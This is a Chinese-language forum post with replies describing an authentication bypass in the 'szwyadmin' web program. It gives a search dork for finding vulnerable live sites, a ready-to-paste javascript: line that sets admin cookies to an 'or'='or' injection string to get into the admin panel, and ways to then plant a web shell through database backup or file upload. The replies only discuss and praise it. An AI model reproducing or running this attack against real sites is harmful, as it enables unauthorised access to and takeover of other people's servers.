szwyadmin程序cookies欺骗漏洞拿shell
关键字:inurl:szwyadmin/login.asp任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码:
javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); alert(document.cookie="adminpass="+escape("'or'='or'")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp";
后台拿 shell 的方法:
1、数据库备份拿shell
2、直接改配置之后,上传shell文件(成功极少) 这个说白了,就是登陆注入,只是把post方式转换成cookie注入 还是不错的哦,顶了 不错 感谢楼主的分享~ 还是不错的哦,顶了 wuyan 发表于 2015-6-25 19:59
这个说白了,就是登陆注入,只是把post方式转换成cookie注入
做个详细解释把,么么哒 感谢楼主的分享~